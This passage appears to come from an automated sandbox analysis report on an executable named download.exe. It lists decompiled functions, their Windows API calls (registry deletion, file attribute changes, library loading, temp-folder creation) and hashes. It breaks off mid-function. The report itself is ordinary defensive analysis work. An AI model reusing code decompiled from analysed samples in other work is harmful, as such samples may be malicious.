                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue
                                                      • String ID:
                                                      • API String ID: 3356406503-0
                                                      • Opcode ID: ae4e2f35e0593205c837675dd62997ba6f7ed3afc724381fc97bb922e5473043
                                                      • Instruction ID: 16843ebe9de4b10a0f02fc33a3446f9eb73abb2b3234f807e7777e2680f676dd
                                                      • Opcode Fuzzy Hash: ae4e2f35e0593205c837675dd62997ba6f7ed3afc724381fc97bb922e5473043
                                                      • Instruction Fuzzy Hash: BF11E371A01205FEDF15CF64DA989AEBBB49F00348F20843FE445B72C0D6B84A81DB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 60%
                                                      			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x7a2f90; // 0xae681c
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7a272c =  *0x7a272c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x7a272c, 0x7530,  *0x7a2714), 0); // executed
					}
				}
				return 0;
			}












                                                      0x0040138a
                                                      0x004013fa
                                                      0x00401392
                                                      0x0040139b
                                                      0x004013a0
                                                      0x00000000
                                                      0x00000000
                                                      0x004013a2
                                                      0x004013a3
                                                      0x004013ad
                                                      0x00000000
                                                      0x00401404
                                                      0x004013b0
                                                      0x004013b7
                                                      0x004013bd
                                                      0x004013be
                                                      0x004013c0
                                                      0x004013c2
                                                      0x004013b9
                                                      0x004013b9
                                                      0x004013ba
                                                      0x004013ba
                                                      0x004013c9
                                                      0x004013cb
                                                      0x004013f4
                                                      0x004013f4
                                                      0x004013c9
                                                      0x00000000

                                                      APIs
                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: f1e14ae547b8f36b78d572cd64f3e527c113299c5085ae7931b2eb67e5d22d6e
                                                      • Instruction ID: b093ac6dabfd3bf5cd98619b9c3e878c543c382afaa1261ab96434968757bf0e
                                                      • Opcode Fuzzy Hash: f1e14ae547b8f36b78d572cd64f3e527c113299c5085ae7931b2eb67e5d22d6e
                                                      • Instruction Fuzzy Hash: C601F4316202209FE7094B389D04B6A36A8E751354F10813FF955F65F2D678CC028B4C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402381 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00402381(void* __ebx, void* __edx) {
				long _t6;
				void* _t9;
				void* _t13;
				long _t18;
				void* _t20;
				void* _t22;
				void* _t23;

				_t13 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				_t20 = __edx;
				if( *(_t23 - 0x18) != __ebx) {
					_t6 = E00402B89(_t20, E00402ACB(0x22),  *(_t23 - 0x18) >> 1); // executed
					_t18 = _t6;
					goto L4;
				} else {
					_t9 = E00402B0B(_t26, 2); // executed
					_t22 = _t9;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueA(_t22, E00402ACB(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t13) {
							goto L6;
						}
					}
				}
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}










                                                      0x00402381
                                                      0x00402381
                                                      0x00402384
                                                      0x00402386
                                                      0x004023c2
                                                      0x004023c7
                                                      0x00000000
                                                      0x00402388
                                                      0x0040238a
                                                      0x0040238f
                                                      0x00402393
                                                      0x0040271c
                                                      0x0040271c
                                                      0x00402399
                                                      0x004023a9
                                                      0x004023ab
                                                      0x004023c9
                                                      0x004023cb
                                                      0x00000000
                                                      0x004023d1
                                                      0x004023cb
                                                      0x00402393
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004023A2
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004023AB
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteValue
                                                      • String ID:
                                                      • API String ID: 2831762973-0
                                                      • Opcode ID: 65a0798d36c4bb9ff05db99890c2474b4eec0e6293150e9ab70c33dac0457e9b
                                                      • Instruction ID: 8aec8fe7cd38f654026d76d8600474ef4a57e980fe65a380d0022aaa37355860
                                                      • Opcode Fuzzy Hash: 65a0798d36c4bb9ff05db99890c2474b4eec0e6293150e9ab70c33dac0457e9b
                                                      • Instruction Fuzzy Hash: 27F09C32A00511ABD711BBE89B8EABE76A49B40314F25443FE602B71C1DAFC4D02876D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401E2B Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E49
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E54
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Window$EnableShow
                                                      • String ID:
                                                      • API String ID: 1136574915-0
                                                      • Opcode ID: c2e0d07cf7c5bdb33dd7620c9ab430a01052b6745be682b123c0b856876fc3b2
                                                      • Instruction ID: d2bea1c1c0aacda3dd255fed30ad1f680590af6f3d359f9745203f9ff1fc1010
                                                      • Opcode Fuzzy Hash: c2e0d07cf7c5bdb33dd7620c9ab430a01052b6745be682b123c0b856876fc3b2
                                                      • Instruction Fuzzy Hash: 02E01272B04212AFDB14EBE5EA499EEB7B4DF40319B10443FE411F11D1DA7849419F5D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040156F Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040156F(void* __ebx, int __edx) {
				int _t3;
				void* _t8;
				struct HWND__* _t10;
				struct HWND__* _t11;
				void* _t16;

				_t8 = __ebx;
				_t10 =  *0x7a2710; // 0x10414
				if(_t10 != __ebx) {
					ShowWindow(_t10, __edx); // executed
					_t3 =  *(_t16 - 0x28);
				}
				_t11 =  *0x7a2724; // 0x1040e
				if(_t11 != _t8) {
					ShowWindow(_t11, _t3); // executed
				}
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}








                                                      0x0040156f
                                                      0x0040156f
                                                      0x0040157d
                                                      0x00401581
                                                      0x00401583
                                                      0x00401583
                                                      0x00401586
                                                      0x0040158e
                                                      0x00401596
                                                      0x00401596
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • ShowWindow.USER32(00010414), ref: 00401581
                                                      • ShowWindow.USER32(0001040E), ref: 00401596
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: 6bfd83b54cd70e945bcd9228706dc900d8a338461371b154b40d29b430c88c03
                                                      • Instruction ID: 1e8a20e7e34c326eaa8816cefaf5ed79bffbb2cf12c8d4da7cecda694498405c
                                                      • Opcode Fuzzy Hash: 6bfd83b54cd70e945bcd9228706dc900d8a338461371b154b40d29b430c88c03
                                                      • Instruction Fuzzy Hash: 4CE086B27001119BCF14DBA8EDD0C7E77B5DBC4310710443FD602B36A0C6789D418B28
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406315 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00406315(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E004062A7(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                      0x0040631d
                                                      0x00406320
                                                      0x00406327
                                                      0x0040632f
                                                      0x0040633b
                                                      0x00000000
                                                      0x00406342
                                                      0x00406332
                                                      0x00406339
                                                      0x00000000
                                                      0x0040634a
                                                      0x00000000

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,?,?,0040325C,0000000A), ref: 00406327
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406342
                                                        • Part of subcall function 004062A7: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062BE
                                                        • Part of subcall function 004062A7: wsprintfA.USER32 ref: 004062F7
                                                        • Part of subcall function 004062A7: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040630B
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                      • String ID:
                                                      • API String ID: 2547128583-0
                                                      • Opcode ID: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
                                                      • Instruction ID: cd2a927f582b596fa2e162cbd064daf7ca6e898847132114174d0915a8f4e586
                                                      • Opcode Fuzzy Hash: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
                                                      • Instruction Fuzzy Hash: BCE0863260421057D61066745E0493BA3A89F94700302083EFD47F2140D73C9C3196AD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405B16 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E00405B16(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                      0x00405b1a
                                                      0x00405b27
                                                      0x00405b3c
                                                      0x00405b42

                                                      APIs
                                                      • GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\download.exe,80000000,00000003), ref: 00405B1A
                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B3C
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCreate
                                                      • String ID:
                                                      • API String ID: 415043291-0
                                                      • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                      • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                                                      • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                      • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405AF1 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00405AF1(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                      0x00405af6
                                                      0x00405afc
                                                      0x00405b01
                                                      0x00405b0a
                                                      0x00405b0a
                                                      0x00405b13

                                                      APIs
                                                      • GetFileAttributesA.KERNELBASE(?,?,00405709,?,?,00000000,004058EC,?,?,?,?), ref: 00405AF6
                                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405B0A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                                      • Instruction ID: 414a467aaabbe507cf471caeb43fbb4459db83339ab651609fa67d9973c7acb5
                                                      • Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                                      • Instruction Fuzzy Hash: 60D0C972504125AFC2103728AE0C89BBB65DB54271702CE35F8A9A26B2DB304C969A98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004055E7 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004055E7(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                      0x004055ed
                                                      0x004055f5
                                                      0x00000000
                                                      0x004055fb
                                                      0x00000000

                                                      APIs
                                                      • CreateDirectoryA.KERNELBASE(?,00000000,004031DC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 004055ED
                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055FB
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectoryErrorLast
                                                      • String ID:
                                                      • API String ID: 1375471231-0
                                                      • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                      • Instruction ID: 4c9d675ee46a87f1ce13dde1798736571a6da7ffae6fc201d3902fb2775d8c1a
                                                      • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                      • Instruction Fuzzy Hash: 2AC04C30204501EBD7515B31DE08B177A56AB91781F11883D618AE41B4DA358455DE2E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 706B29F8 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 28%
                                                      			E706B29F8(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x706b4040 != 0 && E706B293D(_a4) == 0) {
					 *0x706b4044 = _t93;
					if( *0x706b403c != 0) {
						_t93 =  *0x706b403c;
					} else {
						E706B2F20(E706B2937(), __ecx);
						 *0x706b403c = _t93;
					}
				}
				_t28 = E706B296B(_a4);
				_t94 = _t93 + 4;
